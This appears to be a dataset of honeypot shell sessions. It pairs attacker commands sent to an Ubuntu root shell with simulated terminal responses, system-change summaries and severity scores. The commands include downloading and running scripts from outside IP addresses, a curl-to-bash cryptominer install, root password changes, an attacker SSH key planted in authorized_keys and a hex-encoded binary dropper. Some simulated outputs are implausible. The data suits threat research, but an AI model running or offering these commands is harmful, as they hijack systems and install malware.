session_id stringclasses 160
values | period stringclasses 1
value | turn_index int64 0 351 | command stringlengths 1 1.77k | response stringlengths 12 6.81k | system_change stringlengths 4 2.61k | severity_vi int64 0 4 | response_source stringclasses 1
value |
|---|---|---|---|---|---|---|---|
3166689473d4 | 2021_2022 | 0 | echo "ZIGAZAGA1488"
cat /dev/stdin | sh
#!/usr/bin/sh
#timeout=30
killSTDIN() {
processID=$(ps -u | grep -v 'grep' | grep cat | grep '/dev/stdin' | head -n 1 | awk -F ' ' '{ print $2 }');
ps -u | grep -v grep | grep cat | grep /dev/stdin | head -n 1 | awk -F { print $2 }
$(kill -9 $processID);
kill -9 $processID
}
en... | root@ubuntu:~# echo "ZIGAZAGA1488"
ZIGAZAGA1488
root@ubuntu:~# cat /dev/stdin | sh
root@ubuntu:~# #!/usr/bin/sh
root@ubuntu:~# #timeout=30
root@ubuntu:~# killSTDIN() {
> processID=$(ps -u | grep -v 'grep' | grep cat | grep '/dev/stdin' | head -n 1 | awk -F ' ' '{ print $2 }');
> ps -u | grep -v grep | grep cat | grep /... |
- The terminal echoed the string "ZIGAZAGA1488".
- Three shell scripts were executed. The scripts defined and executed functions to kill the process reading from stdin, print the system uptime or user id, and then kill the process reading from stdin again. | 3 | curated_ubuntu |
711180fe9722 | 2021_2022 | 0 | /ip cloud print | root@ubuntu:~# /ip cloud print
bash: /ip: No such file or directory
root@ubuntu:~# | No changes were made to the system. | 0 | curated_ubuntu |
711180fe9722 | 2021_2022 | 1 | ifconfig | root@ubuntu:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.100 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::20c:29ff:fe9c:4099 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:9c:40:99 txqueuelen 1000 (Ethernet)
RX packets 267269 b... | No changes were made to the system. | 0 | curated_ubuntu |
711180fe9722 | 2021_2022 | 2 | uname -a | root@ubuntu:~# uname -a
Linux user 5.4.0-159-generic #176-Ubuntu SMP Wed Oct 13 16:45:01 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
root@ubuntu:~# | No changes were made to the system. | 0 | curated_ubuntu |
711180fe9722 | 2021_2022 | 3 | cat /proc/cpuinfo | root@ubuntu:~# cat /proc/cpuinfo
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 85
model name : Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz
stepping : 7
microcode : 0x1
cpu MHz : 2200.000
cache size : 16896 KB
physical id : 0
siblings : ... | No changes were made to the system. | 0 | curated_ubuntu |
711180fe9722 | 2021_2022 | 4 | ps | grep '[Mm]iner' | root@ubuntu:~# ps | grep '[Mm]iner'
root@ubuntu:~# | No changes were made to the system. | 0 | curated_ubuntu |
63a58edbd2f9 | 2021_2022 | 0 | enable | root@ubuntu:~# enable
root@ubuntu:~# | The 'enable' command has been executed. However, as it is a built-in shell command used to enable and disable shell builtins, it does not cause any system changes if no arguments are provided. | 0 | curated_ubuntu |
63a58edbd2f9 | 2021_2022 | 1 | system | root@ubuntu:~# system
bash: system: command not found
root@ubuntu:~# | The 'system' command has been attempted to execute. However, as 'system' is not a recognized command in the Linux terminal, no changes have been made to the system. | 0 | curated_ubuntu |
63a58edbd2f9 | 2021_2022 | 2 | sh | root@ubuntu:~# sh
# | The shell has been changed to 'sh' from 'bash'. | 2 | curated_ubuntu |
63a58edbd2f9 | 2021_2022 | 3 | /bin/busybox gay | # /bin/busybox gay
/bin/busybox: applet not found
# | The command '/bin/busybox gay' was attempted to execute. However, 'gay' is not a recognized applet in BusyBox, so no changes have been made to the system. | 0 | curated_ubuntu |
63a58edbd2f9 | 2021_2022 | 4 | echo -en "\x6d\x69\x6e\x65\x72\x77\x6f\x72\x64" | # echo -en "\x6d\x69\x6e\x65\x72\x77\x6f\x72\x64"
minerword
# | The 'echo' command was used to print the string 'minerword' to the terminal. This command does not cause any changes to the system. | 0 | curated_ubuntu |
63a58edbd2f9 | 2021_2022 | 5 | ls /home; ps aux; /bin/busybox gay; echo -en "\x6d\x69\x6e\x65\x72\x77\x6f\x72\x64" | # ls /home
user1 user2 user3
# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 19356 1584 ? Ss Nov28 0:03 init [2]
root 2 0.0 0.0 0 0 ? S Nov28 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S Nov... |
- The 'ls' command was used to list the contents of the '/home' directory.
- The 'ps aux' command was used to display the currently running processes.
- The command '/bin/busybox gay' was attempted to execute. However, 'gay' is not a recognized applet in BusyBox, so no changes have been made to the system.
- The 'echo... | 0 | curated_ubuntu |
9c64e33d4840 | 2021_2022 | 0 | sh | root@ubuntu:~# sh
sh-4.4# | The shell has been changed to 'sh'. | 2 | curated_ubuntu |
9c64e33d4840 | 2021_2022 | 1 | bash | sh-4.4# bash
root@ubuntu:~# | The shell has been changed back to 'bash'. | 2 | curated_ubuntu |
9c64e33d4840 | 2021_2022 | 2 | shell | root@ubuntu:~# shell
bash: shell: command not found
root@ubuntu:~# | No changes to the system. The command 'shell' is not recognized as a command. | 0 | curated_ubuntu |
9c64e33d4840 | 2021_2022 | 3 | enable | root@ubuntu:~# enable
bash: enable: command not found
root@ubuntu:~# | No changes to the system. The command 'enable' is not recognized as a command. | 0 | curated_ubuntu |
9c64e33d4840 | 2021_2022 | 4 | system | root@ubuntu:~# system
bash: system: command not found
root@ubuntu:~# | No changes to the system. The command 'system' is not recognized as a command. | 0 | curated_ubuntu |
9c64e33d4840 | 2021_2022 | 5 | linuxshell | root@ubuntu:~# linuxshell
bash: linuxshell: command not found
root@ubuntu:~# | No changes to the system. The command 'linuxshell' is not recognized as a command. | 0 | curated_ubuntu |
9c64e33d4840 | 2021_2022 | 6 | /bin/busybox BITCOIN | root@ubuntu:~# /bin/busybox BITCOIN
/bin/busybox: applet not found
root@ubuntu:~# | No changes to the system. The command 'BITCOIN' is not recognized as a command in BusyBox. | 0 | curated_ubuntu |
890e4c0045f3 | 2021_2022 | 0 | uname -a ; lscpu | root@ubuntu:~# uname -a
Linux user 5.4.0-159-generic #176-Ubuntu SMP Wed Oct 13 16:45:01 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
root@ubuntu:~# lscpu
Architecture: x86_64
CPU op-mode(s): 32-bit, 64-bit
Byte Order: Little Endian
CPU(s): 24
On-line CPU(s) list: 0-23
Thread(s) per core: ... | No changes to the system were made. | 0 | curated_ubuntu |
31a7efcd407b | 2021_2022 | 0 | curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ | root@ubuntu:~# curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ
Download successful
root@ubuntu:~# | A script from 'http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh' was downloaded and executed with the argument '45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ'. The script is likely to have made changes to the system, possibly related to setting up... | 3 | curated_ubuntu |
e58ef106523a | 2021_2022 | 0 | sh | root@ubuntu:~# sh
# | The shell has been changed to 'sh'. | 2 | curated_ubuntu |
e58ef106523a | 2021_2022 | 1 | shell | # shell
sh: shell: not found
# | No changes were made to the system. | 0 | curated_ubuntu |
e58ef106523a | 2021_2022 | 2 | ls / | # ls /
bin dev home lib32 lost+found mnt proc run srv tmp var
boot etc lib lib64 media opt root sbin sys usr
# | No changes were made to the system. | 0 | curated_ubuntu |
e58ef106523a | 2021_2022 | 3 | cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.31.98.17/0x83911d24Fx.sh; curl -O http://194.31.98.17/0x83911d24Fx.sh; chmod 777 0x83911d24Fx.sh; sh 0x83911d24Fx.sh; tftp 194.31.98.17 -c get 0xt984767.sh; chmod 777 0xft6426467.sh; sh 0xft6426467.sh; tftp -r 0xtf2984767.sh -g 194.31.98.17; chmod 7... | # cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
# wget http://194.31.98.17/0x83911d24Fx.sh
--2023-11-01 01:11:30-- http://194.31.98.17/0x83911d24Fx.sh
Connecting to 194.31.98.17:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28 [application/x-sh]
Saving to: ‘0x83911d24Fx.sh’
100%[====... |
- The terminal changed the working directory to '/'.
- Four shell scripts were downloaded from the server with IP '194.31.98.17' using different methods (wget, curl, tftp, ftpget).
- The downloaded scripts were given full permissions and executed.
- All scripts and all files in the '/' directory were removed. | 4 | curated_ubuntu |
126339c32704 | 2021_2022 | 0 | cd /tmp && chmod +x Lhtln3CT && bash -c ./Lhtln3CT | root@ubuntu:~# cd /tmp && chmod +x Lhtln3CT && bash -c ./Lhtln3CT
root@ubuntu:/tmp# | The terminal changed the working directory to '/tmp'. The file 'Lhtln3CT' in the '/tmp' directory was given executable permissions and was executed. | 3 | curated_ubuntu |
126339c32704 | 2021_2022 | 1 | ./Lhtln3CT | root@ubuntu:/tmp# ./Lhtln3CT
root@ubuntu:/tmp# | The executable file 'Lhtln3CT' in the '/tmp' directory was executed. | 3 | curated_ubuntu |
236582a558f9 | 2021_2022 | 0 | cd /tmp && chmod +x 2p8unLIG && bash -c ./2p8unLIG | root@ubuntu:~# cd /tmp && chmod +x 2p8unLIG && bash -c ./2p8unLIG
root@ubuntu:/tmp# | The terminal changed the working directory to '/tmp'. The file '2p8unLIG' in the '/tmp' directory was given execute permissions and was executed. | 3 | curated_ubuntu |
236582a558f9 | 2021_2022 | 1 | ./2p8unLIG | root@ubuntu:/tmp# ./2p8unLIG
root@ubuntu:/tmp# | The file '2p8unLIG' in the '/tmp' directory was executed again. | 3 | curated_ubuntu |
f2b87b627a22 | 2021_2022 | 0 | cat /proc/cpuinfo | grep name | wc -l | root@ubuntu:~# cat /proc/cpuinfo | grep name | wc -l
24
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
f2b87b627a22 | 2021_2022 | 1 | echo -e "!@#$%^&*()\nXJ53qXwudUUo\nXJ53qXwudUUo"|passwd|bash | root@ubuntu:~# echo -e "!@#$%^&*()\nXJ53qXwudUUo\nXJ53qXwudUUo"|passwd|bash
New password: Retype new password: passwd: password updated successfully
root@ubuntu:~# | The password for the current user has been changed to 'XJ53qXwudUUo'. | 4 | curated_ubuntu |
f2b87b627a22 | 2021_2022 | 2 | echo "!@#$%^&*()\nXJ53qXwudUUo\nXJ53qXwudUUo\n"|passwd | root@ubuntu:~# echo "!@#$%^&*()\nXJ53qXwudUUo\nXJ53qXwudUUo\n"|passwd
New password: Retype new password: passwd: password updated successfully
root@ubuntu:~# | The password for the current user has been changed to 'XJ53qXwudUUo'. | 4 | curated_ubuntu |
f2b87b627a22 | 2021_2022 | 3 | cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' | root@ubuntu:~# cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
f2b87b627a22 | 2021_2022 | 4 | free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' | root@ubuntu:~# free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
725938364 123456 234567 345678 456789 567890
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
f2b87b627a22 | 2021_2022 | 5 | ls -lh $(which ls) | root@ubuntu:~# ls -lh $(which ls)
-rwxr-xr-x 1 root root 129K Jan 18 2023 /bin/ls
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
f2b87b627a22 | 2021_2022 | 6 | which ls | root@ubuntu:~# which ls
/bin/ls
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
f2b87b627a22 | 2021_2022 | 7 | crontab -l | root@ubuntu:~# crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hou... | No changes to the system. | 0 | curated_ubuntu |
f2b87b627a22 | 2021_2022 | 8 | w | root@ubuntu:~# w
01:16:17 up 2:00, 1 user, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 192.168.1.100 01:16 2.00s 0.03s 0.00s w
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
f2b87b627a22 | 2021_2022 | 9 | uname -m | root@ubuntu:~# uname -m
x86_64
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
f2b87b627a22 | 2021_2022 | 10 | cat /proc/cpuinfo | grep model | grep name | wc -l | root@ubuntu:~# cat /proc/cpuinfo | grep model | grep name | wc -l
24
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
f2b87b627a22 | 2021_2022 | 11 | top | root@ubuntu:~# top
top - 01:17:35 up 2:00, 1 user, load average: 0.00, 0.01, 0.05
Tasks: 88 total, 1 running, 87 sleeping, 0 stopped, 0 zombie
%Cpu(s): 0.3 us, 0.1 sy, 0.0 ni, 99.6 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
MiB Mem : 708590.8 total, 705849.3 free, 2741.5 used, 0.0 buff/cache
MiB Swap: ... | None | 0 | curated_ubuntu |
f2b87b627a22 | 2021_2022 | 12 | uname | root@ubuntu:~# uname
Linux
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
f2b87b627a22 | 2021_2022 | 13 | uname -a | root@ubuntu:~# uname -a
Linux ubuntu 5.4.0-159-generic #176-Ubuntu SMP Wed Oct 13 16:45:01 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
f2b87b627a22 | 2021_2022 | 14 | lscpu | grep Model | root@ubuntu:~# lscpu | grep Model
Model name: Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
f2b87b627a22 | 2021_2022 | 15 | cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5... | root@ubuntu:~# cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0... | The '.ssh' directory was removed and recreated in the home directory. A new SSH public key was added to the 'authorized_keys' file. The permissions of the '.ssh' directory were changed to be accessible only by the owner. | 4 | curated_ubuntu |
e5beb1e4a914 | 2021_2022 | 0 | chmod +x ./.3232227691811897618/xinetd;nohup ./.3232227691811897618/xinetd & | root@ubuntu:~# chmod +x ./.3232227691811897618/xinetd
root@ubuntu:~# nohup ./.3232227691811897618/xinetd &
[1] 12345
root@ubuntu:~# | The file '.3232227691811897618/xinetd' has been given execute permissions and is running in the background with process ID 12345. | 3 | curated_ubuntu |
8c71d4ecfcc2 | 2021_2022 | 0 | cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a | root@ubuntu:~# cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c
1 Intel(R) Xeon(R) Silver 4214 CPU @ 2.20GHz
root@ubuntu:~# uname -a
Linux user 5.4.0-159-generic #176-Ubuntu SMP Tue Aug 31 18:27:58 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
root@ubuntu:~# | No changes to the system. | 0 | curated_ubuntu |
cf9cc6cbb215 | 2021_2022 | 0 | cat /bin/sh | root@ubuntu:~# cat /bin/sh
#!/bin/sh
# This is a shell archive (shar 1.26.3)
# made 02/07/2023 13:05 UTC by <user@host>
# Source directory /home/user
#
# existing files WILL be overwritten
# This shar contains:
# length mode name
# ------ ---------- ------------------------------------------
# 1234 -rw-r--r-- /... | No changes to the system were made. | 0 | curated_ubuntu |
cf9cc6cbb215 | 2021_2022 | 1 | cd /tmp; wget http://31.44.185.235/unknown -O- >.f; chmod 777 .f; ./.f ssh.unknown | root@ubuntu:~# cd /tmp
root@ubuntu:/tmp# wget http://31.44.185.235/unknown -O- >.f
--2023-11-30 02:08:39-- http://31.44.185.235/unknown
Connecting to 31.44.185.235:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: ‘STDOUT’
- [ <=> ... |
- The terminal changed the working directory to '/tmp'.
- A file named '.f' was downloaded from the server with IP '31.44.185.235'.
- The downloaded file was given full permissions and executed with 'ssh.unknown' as an argument. | 3 | curated_ubuntu |
07d0cbb8ef17 | 2021_2022 | 0 | cd /tmp && chmod +x tZft1Zbk && bash -c ./tZft1Zbk | root@ubuntu:~# cd /tmp && chmod +x tZft1Zbk && bash -c ./tZft1Zbk
root@ubuntu:/tmp# | The terminal changed the working directory to '/tmp'. The file 'tZft1Zbk' was given executable permissions and was executed. | 3 | curated_ubuntu |
07d0cbb8ef17 | 2021_2022 | 1 | ./tZft1Zbk | root@ubuntu:/tmp# ./tZft1Zbk
root@ubuntu:/tmp# | The file 'tZft1Zbk' in the '/tmp' directory was executed. | 3 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 0 | start | root@ubuntu:~# start
start: command not found
root@ubuntu:~# | No changes were made to the system as the 'start' command is not recognized in this context. | 0 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 1 | enable | root@ubuntu:~# enable
enable: command not found
root@ubuntu:~# | No changes were made to the system as the 'enable' command is not recognized in this context. | 0 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 2 | config terminal | root@ubuntu:~# config terminal
config: command not found
root@ubuntu:~# | No changes were made to the system as the 'config terminal' command is not recognized in this context. | 0 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 3 | system | root@ubuntu:~# system
system: command not found
root@ubuntu:~# | No changes were made to the system as the 'system' command is not recognized in this context. | 0 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 4 | linuxshell | root@ubuntu:~# linuxshell
linuxshell: command not found
root@ubuntu:~# | No changes were made to the system as the 'linuxshell' command is not recognized in this context. | 0 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 5 | shell | root@ubuntu:~# shell
shell: command not found
root@ubuntu:~# | No changes were made to the system as the 'shell' command is not recognized in this context. | 0 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 6 | sh | root@ubuntu:~# sh
# | The shell has been changed to 'sh' from 'bash'. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 7 | echo -e '\x62\x70\x6E\x68\x7A' | # echo -e '\x62\x70\x6E\x68\x7A'
bpnhz
# | No changes were made to the system. The command just printed 'bpnhz' to the terminal. | 0 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 8 | passwd | # passwd
New password:
Retype new password:
passwd: password updated successfully
# | The root user's password has been changed. | 4 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 9 | cd /tmp || cd /var || cd /dev || cd /etc | # cd /tmp || cd /var || cd /dev || cd /etc
# | The working directory was changed to '/tmp'. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 10 | cat /bin/ls|more | # cat /bin/ls|more
<binary file content>
# | No changes were made to the system. The command just displayed the binary content of the '/bin/ls' file. | 0 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 11 | cat /bin/ls|head -n 1 | # cat /bin/ls|head -n 1
<binary file content>
# | No changes were made to the system. The command just displayed the first line of the binary content of the '/bin/ls' file. | 0 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 12 | dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox | # dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
1+0 records in
1+0 records out
52 bytes copied, 0.000123456 s, 421 MB/s
<binary file content>
# | No changes were made to the system. The command just displayed the binary content of the '/bin/ls' and '/bin/busybox' files. | 0 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 13 | chmod | # chmod
chmod: missing operand
Try 'chmod --help' for more information.
# | No changes were made to the system as the 'chmod' command requires additional operands to function. | 0 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 14 | echo -ne '\x7F\x45\x4C\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x00\x00\x01\x00\x11\x65\x20\x00\x00\x00\x34\x00\x00\x00\x00\x00\x00\x10\x07\x00\x34\x00\x20\x00\x02\x00\x28\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x10\x00\x00'>./catbpnhz | # echo -ne '\x7F\x45\x4C\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x00\x00\x01\x00\x11\x65\x20\x00\x00\x00\x34\x00\x00\x00\x00\x00\x00\x10\x07\x00\x34\x00\x20\x00\x02\x00\x28\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x10\x00\x00'>./catbpnhz
# | A file named 'catbpnhz' was created in the current directory with the content being the binary string provided. | 1 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 15 | echo -ne '\x00\x10\x00\x00\x00\x01\x6E\xDB\x00\x01\x6E\xDB\x00\x00\x00\x05\x00\x01\x00\x00\x00\x00\x00\x01\x00\x00\x64\x70\x00\x48\x64\x70\x00\x48\x64\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x01\x00\x00\x7B\x73\xA5\xF4\x55\x50\x58\x21\x09\xE0\x0D\x89'>>./catbpnhz | # echo -ne '\x00\x10\x00\x00\x00\x01\x6E\xDB\x00\x01\x6E\xDB\x00\x00\x00\x05\x00\x01\x00\x00\x00\x00\x00\x01\x00\x00\x64\x70\x00\x48\x64\x70\x00\x48\x64\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x01\x00\x00\x7B\x73\xA5\xF4\x55\x50\x58\x21\x09\xE0\x0D\x89'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 16 | echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x94\x00\x00\x00\x64\x02\x00\x00\x00\x37\xF7\x24\xFF\x7F\x45\x4C\x46\x01\x02\x01\x00\x02\x00\x08\x05\x10\x40\x02\x6F\xDD\xED\xBB\x60\x07\x34\x00\x03\xD0\xEC\x06\x10\x07\x09\x20\x0B\x00\x28\x00\xF2'>>./catbpnhz | # echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x94\x00\x00\x00\x64\x02\x00\x00\x00\x37\xF7\x24\xFF\x7F\x45\x4C\x46\x01\x02\x01\x00\x02\x00\x08\x05\x10\x40\x02\x6F\xDD\xED\xBB\x60\x07\x34\x00\x03\xD0\xEC\x06\x10\x07\x09\x20\x0B\x00\x28\x00\xF2'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 17 | echo -ne '\x60\x5F\xEC\x0E\x00\x0D\x1F\x00\x40\x03\x03\x73\xB0\xEC\x6E\xB0\x2D\x00\x05\x19\x01\x0F\xB4\x00\x47\x03\xFD\xD7\x5D\x1E\x00\x5C\xD4\xF0\xBC\x17\x06\x1F\x64\x74\xE5\x51\x00\x00\x40\x77\x81\x00\x07\x03\x04\x01\x00\x00\x00\x00\x00\x00\x20\xFF\x00\x03\x73\x1C'>>./catbpnhz | # echo -ne '\x60\x5F\xEC\x0E\x00\x0D\x1F\x00\x40\x03\x03\x73\xB0\xEC\x6E\xB0\x2D\x00\x05\x19\x01\x0F\xB4\x00\x47\x03\xFD\xD7\x5D\x1E\x00\x5C\xD4\xF0\xBC\x17\x06\x1F\x64\x74\xE5\x51\x00\x00\x40\x77\x81\x00\x07\x03\x04\x01\x00\x00\x00\x00\x00\x00\x20\xFF\x00\x03\x73\x1C'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 18 | echo -ne '\x00\x01\x56\x47\x02\x00\x00\x00\x77\xFF\xFF\xFF\x3C\x1C\x00\x08\x27\x9C\x44\x8C\x03\x99\xE0\x21\x27\xBD\xFF\xE0\xAF\xBC\x00\x10\xAF\xBF\x00\x1C\x07\x18\x04\x11\xFB\xF2\x60\xEE\x00\x01\x00\x00\x23\x68\x03\x9F\x8F\x99\x80\x24\x13\xD9\x73\xDF\xFF\x27\x39\x01'>>./catbpnhz | # echo -ne '\x00\x01\x56\x47\x02\x00\x00\x00\x77\xFF\xFF\xFF\x3C\x1C\x00\x08\x27\x9C\x44\x8C\x03\x99\xE0\x21\x27\xBD\xFF\xE0\xAF\xBC\x00\x10\xAF\xBF\x00\x1C\x07\x18\x04\x11\xFB\xF2\x60\xEE\x00\x01\x00\x00\x23\x68\x03\x9F\x8F\x99\x80\x24\x13\xD9\x73\xDF\xFF\x27\x39\x01'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 19 | echo -ne '\xDC\x03\x20\xF8\x09\x0B\x8F\x33\x07\x2F\x92\x27\x83\x0C\x38\x20\x40\x90\xB0\xBB\x9F\x3B\x8F\x67\x07\x03\xE0\x2F\xBD\x00\x20\x37\xA5\xBB\x1B\x6C\x00\x8B\xD8\x87\x20\xAF\xB1\x8B\xB0\xEC\xDF\xBF\x7F\x97\x8F\x91\x80\x18\x2F\x92\x22\xD0\xF0\x07\x14\x40\x00\x1D'>>./catbpnhz | # echo -ne '\xDC\x03\x20\xF8\x09\x0B\x8F\x33\x07\x2F\x92\x27\x83\x0C\x38\x20\x40\x90\xB0\xBB\x9F\x3B\x8F\x67\x07\x03\xE0\x2F\xBD\x00\x20\x37\xA5\xBB\x1B\x6C\x00\x8B\xD8\x87\x20\xAF\xB1\x8B\xB0\xEC\xDF\xBF\x7F\x97\x8F\x91\x80\x18\x2F\x92\x22\xD0\xF0\x07\x14\x40\x00\x1D'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
21dae9a5de5b | 2021_2022 | 20 | echo -ne '\x47\xED\xFD\x3E\x72\x90\x80\x8E\x02\x74\x40\x07\x8C\x59\x05\x00\x3D\xF7\xB5\xB7\x13\x79\x09\x24\x42\x96\x77\xAE\x1B\x1F\xBE\x3F\x3F\xEC\x7B\x1F\x17\x20\xFF\xF9\x8F\x82\x87\xF8\x0F\x10\x66\xAD\xDD\xDE\x3D\x08\x24\x02\xC3\x8F\x84\xB3\xB7\x13\x73\xEE\x7B\xFF'>>./catbpnhz | # echo -ne '\x47\xED\xFD\x3E\x72\x90\x80\x8E\x02\x74\x40\x07\x8C\x59\x05\x00\x3D\xF7\xB5\xB7\x13\x79\x09\x24\x42\x96\x77\xAE\x1B\x1F\xBE\x3F\x3F\xEC\x7B\x1F\x17\x20\xFF\xF9\x8F\x82\x87\xF8\x0F\x10\x66\xAD\xDD\xDE\x3D\x08\x24\x02\xC3\x8F\x84\xB3\xB7\x13\x73\xEE\x7B\xFF'>>./catbpnhz
# | The binary string provided was appended to the 'catbpnhz' file in the current directory. | 2 | curated_ubuntu |
